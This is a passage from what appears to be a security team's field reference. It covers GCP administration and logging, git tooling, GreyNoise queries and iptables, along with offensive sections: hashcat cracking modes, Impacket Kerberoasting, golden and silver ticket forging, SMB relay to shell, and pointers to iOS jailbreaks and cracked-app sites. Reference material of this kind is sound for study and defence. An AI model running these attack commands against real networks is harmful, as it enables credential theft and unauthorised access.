gcloud compute instances create vm1 --image image-1 Create an
--tags test --zone "<zone>" --machine-type f1-micro instance
gcloud compute ssh --project "<project-name>" --zone SSH to
"<zone-name>" "<instance-name>" instance
gcloud compute copy-files example-instance:~/REMOTE- Download
DIR ~/LOCAL-DIR --zone us-central1-a files
gcloud compute copy-files ~/LOCAL-FILE-1 example-
instance:~/REMOTE-DIR --zone us-central1-a Upload files
DISKS/VOLUMES
List all
gcloud compute disks list disks
List all disk
gcloud compute disk-types list types
List all
gcloud compute snapshots list snapshots
gcloud compute disks snapshot <diskname> -- Create
snapshotname <name1> --zone $zone snapshot
NETWORK
List all
gcloud compute networks list networks

72
gcloud compute networks describe <network-name> -- Detail of one
format json network
Create
gcloud compute networks create <network-name> network
gcloud compute networks subnets create subnet1 --
network net1 --range [Link]/24 Create subnet
gcloud compute addresses create --region us-west2-a Get a static
vpn-1-static-ip ip
List all ip
gcloud compute addresses list addresses
gcloud compute addresses describe <ip-name> --region Describe ip
us-central1 address
List all
gcloud compute routes list routes
DNS
List of all
record-sets
gcloud dns record-sets list --zone my_zone in myzone
gcloud dns record-sets list --zone my_zone -- List first 10
limit=10 DNS records
FIREWALL
List all
firewall
gcloud compute firewall-rules list rules
List all
forwarding
gcloud compute forwarding-rules list rules
Describe one
gcloud compute firewall-rules describe <rule-name> firewall rule
gcloud compute firewall-rules create my-rule -- Create one
network default --allow tcp:9200 tcp:3306 firewall rule
gcloud compute firewall-rules update default -- Update one
network default --allow tcp:9200 tcp:9300 firewall rule
IMAGES/CONTAINERS
List all
gcloud compute images list images
List all
container
gcloud container clusters list clusters
gcloud container clusters get-credentials <cluster- Set kubectl
name> context
RDS
List all sql
gcloud sql instances list instances
SERVICES
List my
backend
gcloud compute backend-services list services

73
 List all my
health check
gcloud compute http-health-checks list endpoints
List all URL
gcloud compute url-maps list maps

REFERENCE:
[Link]

G G
GCP_Defend
BLUE TEAM LOGGING CLOUD

Security-related logs
Logs provide a rich data set to help identify specific security
events. Each of the following log sources might provide details
that you can use in your analysis.

Cloud Audit Logs

Google Cloud services write audit logs called Cloud Audit Logs.
These logs help you answer the questions, "Who did what, where, and
when?" There are three types of audit logs for each project,
folder, and organization: Admin Activity, Data Access, and System
Event. These logs collectively help you understand what
administrative API calls were made, what data was accessed, and
what system events occurred. This information is critical for any
analysis. For a list of Google Cloud services that provide audit
logs, see Google services with audit logs.

Cloud Audit Logs for GKE also exposes Kubernetes Audit Logging,
which provides a chronological record of calls made to the
Kubernetes API server. These logs are also collected in Cloud Audit
Logs.

App logs
Stackdriver Logging collects your container standard output and
error logs. You can add other logs by using the Sidecar approach.
For clusters with Istio and Stackdriver enabled, the Istio
Stackdriver adapter collects and reports the Istio-specific logs
and sends the logs to Stackdriver Logging.

Infrastructure logs
Infrastructure logs offer insight into the activities and events at
the OS, cluster, and networking levels.

GKE audit logs

74
GKE sends two types of audit logs: GKE audit logs and Kubernetes
Audit Logging. Kubernetes writes audit logs to Cloud Audit Logs for
calls made to the Kubernetes API server. Kubernetes audit log
entries are useful for investigating suspicious API requests, for
collecting statistics, and for creating monitoring alerts for
unwanted API calls. In addition, GKE writes its own audit logs that
identify what occurs in a GKE cluster.

Compute Engine Cloud Audit Logs for GKE nodes

GKE runs on top of Compute Engine nodes, which generate their own
audit logs. In addition, you can configure auditd to capture Linux
system logs. auditd provides valuable information such as error
messages, login attempts, and binary executions for your cluster
nodes. Both the Compute Engine audit logs and the auditd audit logs
provide insight into activities that happen at the underlying
cluster infrastructure level.

Container logs
For container and system logs, GKE deploys a per-node logging agent
that reads container logs, adds helpful metadata, and then stores
the logs. The logging agent checks for container logs in the
following sources:

• Standard output and standard error logs from containerized

processes
• kubelet and container runtime logs
• Logs for system components, such as VM startup scripts

For events, GKE uses a deployment in the kube-system namespace that

automatically collects events and sends them to Logging. Logs are
collected for clusters, nodes, pods, and containers.

Istio on Google Kubernetes Engine

For clusters with Istio, the Istio Stackdriver adapter is installed
during cluster creation, which sends metrics, logging, and trace
data from your mesh to Stackdriver.

Auditd for Container-Optimized OS on GKE

For Linux systems, the auditd daemon provides access to OS system-
level commands and can provide valuable insight into the events
inside your containers. On GKE, you can collect auditd logs and
send them to Logging.

VPC Flow Logs

VPC Flow Logs records a sample of network flows sent from and
received by VM instances. This information is useful for analyzing
network communication. VPC Flow Logs includes all pod-to-pod
traffic through the Intranode Visibility feature in your Kubernetes
cluster.

REFERENCE:

75
[Link]
for-GKE-apps

G G
GCP_Exploit
RED TEAM EXPLOITATION CLOUD

SCOUT
Scout Suite is an open source multi-cloud security-auditing tool,
which enables security posture assessment of cloud environments.

STEP 1: Download and install Gcloud command-line tool:

[Link]

STEP 2: Set the obtained target creds in your configuration:

gcloud config set account <account>

STEP 3: Execute ‘scout’ using a user account or service account:

$ python [Link] --provider gcp --user-account

$ python [Link] --provider gcp --service-account --key-file

/path/to/keyfile

STEP 4: To scan a GCP account, execute either of the following:

Organization: organization-id <ORGANIZATION_ID>
Folder: folder-id <FOLDER_ID>
Project: project-id <PROJECT_ID>

REFERENCE:
[Link]
functions-security
[Link]
[Link]
privileges-in-google-cloud-platform/

G G
GCP_Hardening
BLUE TEAM CONFIGURATION CLOUD

GKE Hardening Guide

[Link]
your-cluster

76
G G
GCP_Terms
ALL INFORMATIONAL CLOUD

Google Cloud Developers Cheat Sheet

[Link]
[Link]
google-cloud-products/

G G
GHIDRA
RED/BLUE TEAM REVERSE ENGINEER BINARIES
Ghidra is a software reverse engineering framework developed by NSA
that is in use by the agency for more than a decade. Basically, a
software reverse engineering tool helps to dig up the source code
of a proprietary program which further gives you the ability to
detect malware threats or potential bugs.

PROJECT/PROGRAM SHORTCUT MENU

New Project Ctrl+N File → New Project
Open Project Ctrl+O File → Open Project
File → Close
Close Project1 Ctrl+W
Project
Save Project1 Ctrl+S File → Save Project
Import File1 I File → Import File
File → Export
Export Program O
Program
File → Open File
Open File System1 Ctrl+I
System
NAVIGATION
Go To G Navigation → Go To
Back Alt+←
Forward Alt+→
Navigation → Toggle
Toggle Direction Ctrl+Alt+T Code Unit Search
Direction
Navigation → Next
Next Instruction Ctrl+Alt+I
Instruction
Navigation → Next
Next Data Ctrl+Alt+D
Data
Navigation → Next
Next Undefined Ctrl+Alt+U
Undefined
Navigation → Next
Next Label Ctrl+Alt+L
Label

77
 Navigation → Next
Next Function Ctrl+Alt+F
Function
Navigation → Go To
Previous Function Ctrl+↑
Previous Function
Navigation → Next
Next Non-function
Ctrl+Alt+N Instruction Not In
Instruction
a Function
Navigation → Next
Next Different Byte
Ctrl+Alt+V Different Byte
Value
Value
Navigation → Next
Next Bookmark Ctrl+Alt+B
Bookmark
MARKUP
Undo Ctrl+Z Edit → Undo
Redo Ctrl+Shift+Z Edit → Redo
File → Save program
Save Program Ctrl+S
name
Disassemble D ❖ → Disassemble
❖ → Clear Code
Clear Code/Data C
Bytes
Add Label Address
L ❖ → Add Label
field
Edit Label Label
L ❖ → Edit Label
field
Rename Function
L ❖ → Function →
Function name field Rename Function
Remove Label Label
field
Del ❖ → Remove Label
Remove Function ❖ → Function →
Del
Function name field Delete Function
❖ → Data → Choose
Define Data T
Data Type
❖ → Data → Last
Repeat Define Data Y
Used: type
Rename Variable
Variable in L ❖ → Rename Variable
decompiler
Retype Variable
Variable in Ctrl+L ❖ → Retype Variable
decompiler
❖ → Data → Cycle →
Cycle Integer Types B byte, word, dword,
qword
❖ → Data → Cycle →
Cycle String Types ' char, string,
unicode
Cycle Float Types F ❖ → Data → Cycle →
float, double

78
 ❖ → Data → Create
Create Array2 [
Array
Create Pointer2 P ❖ → Data → pointer
Create Structure
Shift+[ ❖ → Data → Create
Selection of data Structure
New Structure Data
❖ → New → Structure
type container
File → Parse C
Import C Header
Source
❖ → References →
Cross References Show References to
context
WINDOWS
Bookmarks Ctrl+B Window → Bookmarks
Window → Bytes:
Byte Viewer
program name
Function Call Trees
Window → Data Type
Data Types
Manager
Window → Decompile:
Decompiler Ctrl+E
function name
Window → Function
Function Graph
Graph
Window → Script
Script Manager
Manager
Memory Map Window → Memory Map
Window → Register
Register Values V
Manager
Window → Symbol
Symbol Table
Table
Window → Symbol
Symbol References
References
Window → Symbol
Symbol Tree
Tree
SEARCH
Search Memory S Search → Memory
Search → Program
Search Program Text Ctrl+Shift+E
Text
MISC
Select Select → what
Tools → Program
Program Differences 2
Differences
Rerun Script Ctrl+Shift+R
Assemble Ctrl+Shift+G ❖ → Patch
Instruction
**❖ indicates the context menu, i.e., right-click.

REFERENCE:
[Link]
[Link]

79
G G
GIT
ALL ADMINISTRATION SOURCE/DOCUMENTATION

Configure Tooling
Sets the name attached to your commit transaction
# git config --global [Link] "[name]"

Set the email attached to your commit transactions

# git config --global [Link] "[email address]"
Enables colorization of command line output
# git config --global [Link] auto

Create Repositories
Turn an existing directory into a git repository
# git init
Clone (download) a repository that already exists, including all of
the files, branches, and commits
# git clone [url] or [/path] or [user@host:/path]

Branches
Create a new branch
# git branch [branch-name]
Switches to the specified branch and updates the working directory
# git checkout [branch-name]
Combines the specified branch’s history into the current branch.
# git merge [branch]
Deletes the specified branch
# git branch -d [branch-name]
Push branch to remote repository
# git push origin [branch]

Synchronize Changes
Downloads all history from the remote tracking branches
# git fetch
Combines remote tracking branch into current local branch
# git merge
Uploads all local branch commits to GitHub
# git push
Updates your current local working branch with all new commits from
the remote branch
# git pull

80
Browse History Changes
List version history for the current branch
# git log
List version history for a file
# git log --follow [file]
Show content differences between two branches
# git diff [branch-1]…[branch-2]
Output metadata and content changes of a commit
# git show [commit]
Snapshots a file in preparation for versioning
# git add [file]
Remove a git file from a repository
# git rm [file]
Record file snapshot in permanent version history
# git commit -m “[description text]”

Redo & Restore Commits

Undo all commits after the specified commit, except changes locally
# git reset [commit]
Discard all history & changes back to commit
# git reset --hard [commit]
Replace working copy with latest from HEAD
# git checkout --[file]

Terms
git: an open source, distributed version-control system
GitHub: a platform for hosting and collaborating on Git
repositories
commit: a Git object, a snapshot of your entire repository
compressed into a SHA
branch: a lightweight movable pointer to a commit
clone: a local version of a repository, including all commits and
branches
remote: a common repository on GitHub that all team member use to
exchange their changes
fork: a copy of a repository on GitHub owned by a different user
pull request: a place to compare and discuss the differences
introduced on a branch with reviews, comments, integrated tests,
and more
HEAD: representing your current working directory, the HEAD pointer
can be moved to different branches, tags, or commits when using git
checkout

REFERENCE:
[Link]

81
G G
GITHUB CLI
ALL ADMINISTRATION SOURCE/DOCUMENTATION
gh is GitHub on the command line and brings pull requests, issues,
and other GitHub concepts to the terminal next to where you are
already working with git and your code.

# Create an issue interactively

gh issue create

# Create an issue using flags

gh issue create --title "Issue title" --body "Issue body"

# Quickly navigate to the issue creation page

gh issue create --web

# Viewing a list of open issues

gh issue list

# Viewing a list of closed issues assigned to a user

gh issue list --state closed --assignee user

# Viewing issues relevant to you

gh issue status

# Viewing an issue in the browser

gh issue view <issue_number>

# Viewing an issue in terminal

gh issue view <issue_number> --preview

# Check out a pull request in Git Example Syntax

gh pr checkout {<number> | <url> | <branch>} [flags]

# Checking out a pull request locally

gh pr checkout <number>

# Checking out a pull request locally with branch name or URL

gh pr checkout branch-name

# Create a pull request interactively

gh pr create

# Create a pull request using flags

82
gh pr create --title "Pull request title" --body "Pull request
body"

# Quickly navigate to the pull request creation page

gh pr create --web

# Viewing a list of open pull requests

gh pr list

# Viewing a list of closed pull requests assigned to a user

gh pr list --state closed --assignee user

# Viewing the status of your relevant pull requests

gh pr status

# Viewing a pull request in the browser

gh pr view <number>

# Viewing a pull request in terminal

gh pr view <number> --preview

REFERENCE:
[Link]

G G
GITHUB_Exploit
RED/BLUE TEAM ADMINISTRATION EXPOSED SECRETS
It’s advantageous to search git repos like Github or Gitlab for
exposed credentials, api keys, and other authentication methods.

TRUFFLE HOG
[Link]

STEP 1: pip install truffleHog

STEP 2: Fire at a git repo or local branches:

truffleHog --regex --entropy=False
[Link]

truffleHog [Link]

GITROB

83
Gitrob will clone repos to moderate depth and then iterate through
commit histories flagging files that match potentially sensitive
content.
[Link]
[Link]

STEP 1: Download precompiled gitrob release

STEP 2: Login and generate/copy your GITHUB access token:

[Link]

STEP 3: Launch Gitrob in analyze mode

gitrob analyze <username> --site=[Link] --
endpoint=[Link] --access-
tokens=token1,token2

G G
GREYNOISE
BLUE TEAM THREAT INTEL CLOUD
GreyNoise - collects and analyzes untargeted, widespread, and
opportunistic scan and attack activity that reaches every server
directly connected to the Internet. Mass scanners (such as Shodan
and Censys), search engines, bots, worms, and crawlers generate
logs and events omnidirectionally on every IP address in the IPv4
space. GreyNoise gives you the ability to filter this useless noise
out.
**CLI & WEB UI Available

GREYNOISE CLI
Install the library:
pip install greynoise or python [Link] install
Save your configuration:
greynoise setup --api-key <your-API-key>

#CLI COMMAND OPTIONS

query Run a GNQL structured query.
account View information about your GreyNoise account.
List, create, delete, and manage your GreyNoise
alerts alerts.
Analyze the IP addresses in a log file, stdin,
analyze etc.
feedback Send feedback directly to the GreyNoise team.
filter Filter the noise from a log file, stdin, etc.
help Show this message and exit.

84
 interesting Report one/more IP "interesting".
ip Query for all information on an IP.
pcap Get PCAP for a given IP address.
quick Check if one/many IPs are "noise".
repl Start an interactive shell.
setup Configure API key.
signature Submit IDS signature to GreyNoise.
stats Aggregate stats from a GNQL query.
version Get version and OS of GreyNoise.

FILTER
Sort external IP's from a log file (firewall, netflow, DNS, etc..)
into a text file one per line [Link]. Stdin to greynoise
filter/remove all IP's that are "noise" and return non-noise IP's"
# cat [Link] | greynoise filter > [Link]

ANALYZE
Sort external IP's from a log file (firewall, netflow, DNS, etc..)
into a text file one per line [Link]. Stdin to greynoise to
analyze all IP's for ASN, Categories, Classifications, Countries,
Operating Systems, Organizations, and Tags:
# cat [Link] | greynoise analyze

STATS
Any query you run can be first checked for statistics returned for
that query:
# greynoise stats "ip:[Link]/24 classification:malicious"

#IP DATA
The IP address of the scanning device IP:
# greynoise query "ip:<IPAddr or CIDR>"
# greynoise query "ip:[Link]"
# greynoise query "[Link]/24"

Whether the device has been categorized as unknown, benign, or

malicious:
# greynoise query "classification:<type>"
# greynoise query "classification:malicious"
# greynoise query "ip:[Link]/24 classification:malicious"

The date the device was first observed:

# greynoise query "first_seen:<YYYY-MM-DD>"

85
# greynoise query "first_seen:2019-12-29"
# greynoise query "ip:[Link]/24 first_seen: 2019-12-29"

The date the device was most recently observed:

# greynoise query "last_seen:<YYYY-MM-DD>"
# greynoise query "last_seen:2019-12-30"
# greynoise query "ip:[Link]/24 last_seen:2019-12-30"

The benign actor the device has been associated with, i.e. Shodan,
GoogleBot, BinaryEdge, etc:
# greynoise query "actor:<actor>"
# greynoise query "actor:censys"
# greynoise query "[Link]/16 actor:censys"

A list of the tags the device has been assigned over the past 90
days:
# greynoise query "tags:<tag string>"
# greynoise query "tags:avtech"
# greynoise query "tags:avtech [Link]:AS17974"

#METADATA
Whether device is a business, isp, or hosting:
# greynoise query "[Link]:<category string>"
# greynoise query "[Link]:ISP"
# greynoise query "[Link]:ISP actor:Yandex"

The full name of the country the device is geographically located

in:
# greynoise query "[Link]:<country>"
# greynoise query "[Link]:turkey"
# greynoise query "[Link]:turkey
[Link]:mobile"

The two-character country code of the country the device is

geographically located:
# greynoise query "metadata.country_code:<##>"
# greynoise query "metadata.country_code:RU"
# greynoise query "metadata.country_code:RU classification:benign"

The city the device is geographically located in

[Link]:
# greynoise query "[Link]:<city string>"
# greynoise query "[Link]:moscow"
# greynoise query "[Link]:moscow tags:SMB Scanner"

The organization that owns the network that the IP address belongs:
# greynoise query "[Link]:<string>"
# greynoise query "[Link]:Yandex"

86
# greynoise query "[Link]:Yandex tags:DNS Scanner"

The reverse DNS pointer of the IP:

# greynoise query "[Link]:<dns string>"
# greynoise query "[Link]:*yandex*"
# greynoise query "[Link]:*yandex* tags:Web Crawler"

The autonomous system the IP address belongs:

# greynoise query "[Link]:<AS#####>"
# greynoise query "[Link]:AS17974"
# greynoise query "[Link]:AS17974 [Link]:PT
TELEKOMUNIKASI INDONESIA"

Whether the device is a known Tor exit node:

# greynoise query "[Link]:<true>"
# greynoise query "[Link]:true"
# greynoise query "[Link]:true [Link]:sweden"

#RAW_DATA
The port number(s) the devices has been observed scanning:
# greynoise query "raw_data.[Link]:<port number>"
# greynoise query "raw_data.[Link]"
# greynoise query "raw_data.[Link] [Link]:sweden"

The protocol of the port the device has been observed scanning:
# greynoise query "raw_data.[Link]:<tcp/udp>"
# greynoise query "raw_data.[Link]:udp"
# greynoise query "raw_data.[Link]:udp
[Link]:china"

Any HTTP paths the device has been observed crawling the Internet:
# greynoise query "raw_data.[Link]:<path string>"
# greynoise query "raw_data.[Link]:*admin*"
# greynoise query "raw_data.[Link]:*admin* tags:Jboss Worm"

Any HTTP user-agents the device has been observed using while
crawling the Internet
# greynoise query "raw_data.[Link]:<UA string>"
# greynoise query "raw_data.[Link]:Mozilla/4.0 (compatible;
MSIE 8.0; Windows NT 5.2; Trident/4.0)"
# greynoise query "raw_data.[Link]:*baidu*
[Link]:Hong Kong"

Fingerprinting TLS encrypted negotiation between client and server

interactions ([Link] &
[Link]
# greynoise query "raw_data.[Link]:<JA3 fingerprint hash>"

87
# greynoise query "raw_data.[Link]:6734f3
7431670b3ab4292b8f60f29984"
# greynoise query "raw_data.[Link]:6734f3
7431670b3ab4292b8f60f29984 [Link]:china"

GREYNOISE WEB UI
[Link]

#IP DATA
The IP address of the scanning device IP:
> ip or cidr
> [Link]
> [Link]/24

Whether the device has been categorized as unknown, benign, or

malicious:
> classification:<type>
> classification:malicious
> [Link]/24 classification:malicious

The date the device was first observed:

> first_seen:<YYYY-MM-DD>
> first_seen:2019-12-29
> [Link]/24 first_seen 2019-12-29

The date the device was most recently observed:

> last_seen:<YYYY-MM-DD>
> last_seen:2019-12-30
> [Link]/24 last_seen:2019-12-30

The benign actor the device has been associated with, i.e. Shodan,
GoogleBot, BinaryEdge, etc:
> actor:<actor>
> actor:censys
> [Link]/16 actor:censys

A list of the tags the device has been assigned over the past 90
days:
> tags:<tag string>
> tags:avtech
> tags:avtech [Link]:AS17974

#METADATA
Whether device is a business, isp, or hosting:
> [Link]:<category string>
> [Link]:ISP
> [Link]:ISP actor:Yandex

88
The full name of the country the device is geographically located
in:
> [Link]:<country>
> [Link]:turkey
> [Link]:turkey [Link]:mobile

The two-character country code of the country the device is

geographically located:
> metadata.country_code:<##>
> metadata.country_code:RU
> metadata.country_code:RU classification:benign

The city the device is geographically located in

[Link]:
> [Link]:<city string>
> [Link]:moscow
> [Link]:moscow tags:SMB Scanner

The organization that owns the network that the IP address belongs:
> [Link]:<string>
> [Link]:Yandex
> [Link]:Yandex tags:DNS Scanner

The reverse DNS pointer of the IP:

> [Link]:<dns string>
> [Link]:*yandex*
> [Link]:*yandex* tags:Web Crawler

The autonomous system the IP address belongs:

> [Link]:<AS#####>
> [Link]:AS17974
> [Link]:AS17974 [Link]:"PT TELEKOMUNIKASI
INDONESIA"

Whether the device is a known Tor exit node:

> [Link]:<true>
> [Link]:true
> [Link]:true [Link]:sweden

#RAW_DATA
The port number(s) the devices has been observed scanning:
> raw_data.[Link]:<port number>
> raw_data.[Link]
> raw_data.[Link] [Link]:sweden

The protocol of the port the device has been observed scanning:
> raw_data.[Link]:<tcp/udp>
> raw_data.[Link]:udp

89
> raw_data.[Link]:udp [Link]:china

Any HTTP paths the device has been observed crawling the Internet:
> raw_data.[Link]:<path string>
> raw_data.[Link]:*admin*
> raw_data.[Link]:*admin* tags:"Jboss Worm"

Any HTTP user-agents the device has been observed using while
crawling the Internet
> raw_data.[Link]:<UA string>
> raw_data.[Link]:"Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 5.2; Trident/4.0)"
> raw_data.[Link]:*baidu* [Link]:Hong Kong

Fingerprinting TLS encrypted negotiation between client and server

interactions ([Link] &
[Link]
> raw_data.[Link]:<JA3 fingerprint hash>
> raw_data.[Link]:6734f37431670b3ab4292b8 f60f29984
> raw_data.[Link]:6734f37431670b3ab4292b8 f60f29984
[Link]:china

REFERENCE:
[Link]
[Link]
[Link]

H
H H

90
 HASHCAT
RED TEAM PASSWORD CRACKING ALL
Hashcat is the world's fastest and most advanced password recovery
utility.

ATTACK MODES
DICTIONARY ATTACK
hashcat -a 0 -m #type [Link] [Link]
DICTIONARY + RULES ATTACK
hashcat -a 0 -m #type [Link] [Link] -r [Link]
COMBINATION ATTACK
hashcat -a 1 -m #type [Link] [Link] [Link]
MASK ATTACK
hashcat -a 3 -m #type [Link] ?a?a?a?a?a?a
HYBRID DICTIONARY + MASK
hashcat -a 6 -m #type [Link] [Link] ?a?a?a?a
HYBRID MASK + DICTIONARY
hashcat -a 7 -m #type [Link] ?a?a?a?a [Link]

RULES
RULEFILE -r
hashcat -a 0 -m #type [Link] [Link] -r [Link]
MANIPULATE LEFT -j
hashcat -a 1 -m #type [Link] left_dict.txt right_dict.txt -j
<option>
MANIPULATE RIGHT -k
hashcat -a 1 -m #type [Link] left_dict.txt right_dict.txt -k
<option>

INCREMENT
DEFAULT INCREMENT
hashcat -a 3 -m #type [Link] ?a?a?a?a?a --increment
INCREMENT MINIMUM LENGTH
hashcat -a 3 -m #type [Link] ?a?a?a?a?a --increment-min=4
INCREMENT MAX LENGTH
hashcat -a 3 -m #type [Link] ?a?a?a?a?a?a --increment-max=5

MISC
BENCHMARK TEST (HASH TYPE)
hashcat -b -m #type
SHOW EXAMPLE HASH
hashcat -m #type --example-hashes
ENABLE OPTIMIZED KERNELS (Warning! Decreasing max password length)
hashcat -a 0 -m #type -O [Link] [Link]
ENABLE SLOW CANDIDATES (For fast hashes w/ small [Link] + rules)
hashcat -a 0 -m #type -S [Link] [Link]
SESSION NAME
hashcat -a 0 -m #type --session <uniq_name> [Link] [Link]
SESSION RESTORE

91
hashcat -a 0 -m #type --restore --session <uniq_name> [Link]
[Link]
SHOW KEYSPACE
hashcat -a 0 -m #type --keyspace [Link] [Link] -r [Link]
OUTPUT RESULTS FILE -o
hashcat -a 0 -m #type -o [Link] [Link] [Link]
CUSTOM CHARSET -1 -2 -3 -4
hashcat -a 3 -m #type [Link] -1 ?l?u -2 ?l?d?s ?1?2?a?d?u?l
ADJUST PERFORMANCE -w
hashcat -a 0 -m #type -w <1-4> [Link] [Link]
KEYBOARD LAYOUT MAPPING
hashcat -a 0 -m #type --keyb=[Link] [Link] [Link]
HASHCAT BRAIN (Local Server & Client)
(Terminal #1) hashcat --brain-server (copy password generated)
(Terminal #2) hashcat -a 0 -m #type -z --brain-password <password>
[Link] [Link]

BASIC ATTACK METHODOLOGY

1- DICTIONARY ATTACK
hashcat -a 0 -m #type [Link] [Link]
2- DICTIONARY + RULES
hashcat -a 0 -m #type [Link] [Link] -r [Link]
3- HYBRID ATTACKS
hashcat -a 6 -m #type [Link] [Link] ?a?a?a?a
4- BRUTEFORCE
hashcat -a 3 -m #type [Link] ?a?a?a?a?a?a?a?a

I
I I

92
 ICS / SCADA TOOLS
RED/BLUE TEAM EXPLOIT/DEFEND ICS/SCADA

AWESOME-INDUSTRIAL-CONTROL-SYSTEM-SECURITY
A curated list of resources related to Industrial Control System
(ICS) security.
[Link]
security

I I
INTERNET EXCHANGE POINTS
ALL INFORMATIONAL N/A

DATABASE OF GLOBAL INTERNET EXCHANGE POINTS

[Link]
[Link]
[Link]

I I
IMPACKET
RED TEAM ESCALATE PRIVS WINDOWS
Impacket is a collection of Python classes for working with network
protocols. Impacket is focused on providing low-level programmatic
access to the packets and for some protocols (e.g. SMB1-3 and
MSRPC) the protocol implementation itself.

ASREPRoast
[Link]:
# check ASREPRoast for all domain users (credentials required)
python [Link]
<domain_name>/<domain_user>:<domain_user_password> -request -format
<AS_REP_responses_format [hashcat | john]> -outputfile
<output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)

python [Link] <domain_name>/ -usersfile <users_file> -format
<AS_REP_responses_format [hashcat | john]> -outputfile
<output_AS_REP_responses_file>

Kerberoasting
[Link]:

93
python [Link]
<domain_name>/<domain_user>:<domain_user_password> -outputfile
<output_TGSs_file>

Overpass The Hash/Pass The Key (PTK)

# Request the TGT with hash
python [Link] <domain_name>/<user_name> -hashes
[lm_hash]:<ntlm_hash>
# Request the TGT with aesKey
python [Link] <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python [Link] <domain_name>/<user_name>:[password]
# If not provided, password is requested

# Set the TGT for impacket use

export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the

TGT
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass

Ticket in Linux Usage

# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following by using the

TGT
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass

Silver Ticket
# To generate the TGS with NTLM
python [Link] -nthash <ntlm_hash> -domain-sid <domain_sid> -
domain <domain_name> -spn <service_spn> <user_name>

# To generate the TGS with AES key

python [Link] -aesKey <aes_key> -domain-sid <domain_sid> -
domain <domain_name> -spn <service_spn> <user_name>

94
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the

TGT
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass

Golden Ticket
# To generate the TGT with NTLM
python [Link] -nthash <krbtgt_ntlm_hash> -domain-sid
<domain_sid> -domain <domain_name> <user_name>

# To generate the TGT with AES key

python [Link] -aesKey <aes_key> -domain-sid <domain_sid> -
domain <domain_name> <user_name>

# Set the ticket for impacket use

export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the

TGT
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass
python [Link] <domain_name>/<user_name>@<remote_hostname> -k -
no-pass

NTLMRELAY SMB RELAY TO SHELL

#turn off SMB Server on Responder by editing the
/etc/responder/[Link] file.

echo '[Link]' > [Link]

[Link] -tf [Link] ./[Link]

REFERENCE:
[Link]
[Link]

I I
iOS
RED/BLUE TEAM INFORMATIONAL MOBILE

95
 iOS ARTIFACTS LOCATIONS
Contacts
/var/mobile/Library/AddressBook/[Link]
Calls
/var/mobile/Library/CallHistoryDB/[Link]
SMS
/var/mobile/Library/SMS/[Link]
Maps
/var/mobile/Applications/[Link]/Library/Maps/[Link]
sdata
Safari
/var/mobile/Library/Safari/[Link]
Photos Database
/var/mobile/Media/PhotoData/[Link]
Apple Notes Parser
[Link]

REFERENCE
[Link]
of-ios-13-artifacts/

iOS JAILBREAK
Checkra1n
checkra1n is a community project to provide a high-quality semi-
tethered jailbreak to all, based on the ‘checkm8’ bootrom exploit.
iPhone 5s – iPhone X, iOS 12.3 and up

REFERENCE:
[Link]

PhoenixPwn
Semi-untethered jailbreak for 9.3.5-9.3.6.
All 32-bit devices supported.

REFERENCE
[Link]

iOS APP TESTING

IDB - iOS App Security Assessment Tool.
[Link]

iRET - iOS Reverse Engineering Toolkit.

[Link]

DVIA - Damn Vulnerable iOS App for learning.

[Link]

96
LibiMobileDevice - A cross-platform protocol library to communicate
with iOS devices.
[Link]

Needle - iOS App Pentesting Tool.

[Link]

AppCritique - iOS App Security Assessment Tool.

[Link]

REFERENCE:
[Link]
[Link]

iOS CRACKED IPA APPS

AppCake
[Link]

IPA Rocks
[Link]

Need to reverse engineer an iOS app ?

Works on iOS11 & 12
1 Add [Link] src to Cydia
2 Install bfdecrypt
3 Go to bfdecrypt pref pane in Settings & set the app to decrypt
4 Launch it
5 Decrypted IPA is stored in the Documents folder of the app

I I
IPTABLES
ALL CONFIGURATION FIREWALL
iptables is a user-space utility program that allows a system
administrator to configure the tables provided by the Linux kernel
firewall.

CHAINS
INPUT: used to control incoming connections.
OUTPUT: used to control outgoing connections.
FORWARD: used for incoming connections that are not local; i.e.
routing and NATing.

ACTIONS
ACCEPT: Allow the specified connection parameters.
DROP: Drop the specified connection parameters.
REJECT: Disallow the connection and send a reject notification to
source.

97
Flush existing rules
# iptables -F

Display all active iptables rules:

# iptables -n -L -v --line-numbers

Set default chain policies <DROP/ACCEPT/REJECT>:

# iptables -P INPUT <DROP/ACCEPT/REJECT>
# iptables -P OUTPUT <DROP/ACCEPT/REJECT>
# iptables -P FORWARD <DROP/ACCEPT/REJECT>

Display rules by chain:

# iptables -L <INPUT/OUTPUT/FORWARD>

Add single IP Address inbound <ACCEPT/DROP/REJECT>:

# iptables -A INPUT -s [Link] -j <ACCEPT/DROP/REJECT>

Add single IP Address outbound <ACCEPT/DROP/REJECT>:

# iptables -A OUTPUT -d [Link] -j <ACCEPT/DROP/REJECT>

Drop outbound access to a specific site:

# iptables -A OUTPUT -p tcp -d [Link] -j DROP

Delete a specific INPUT rule:

# iptables -D INPUT -s [Link] -p tcp -dport 80 -j ACCEPT

Delete a specific OUTPUT rule:

# iptables -D OUTPUT -d [Link] -p tcp -dport 80 -j ACCEPT

Delete by a specific INPUT/OUTPUT/FORWARD rule number:

First show rules by number:
# iptables -n -L -v --line-numbers
Then delete rule:
# iptables -D <INPUT/OUTPUT/FORWARD> 5

Insert a rule in a specific position for inbound:

# iptables -I INPUT 3 -s [Link] -j DROP

Insert a rule in a specific position for outbound:

# iptables -I OUTPUT 2 -d [Link] -j ACCEPT

Allow inbound current established connections and related:

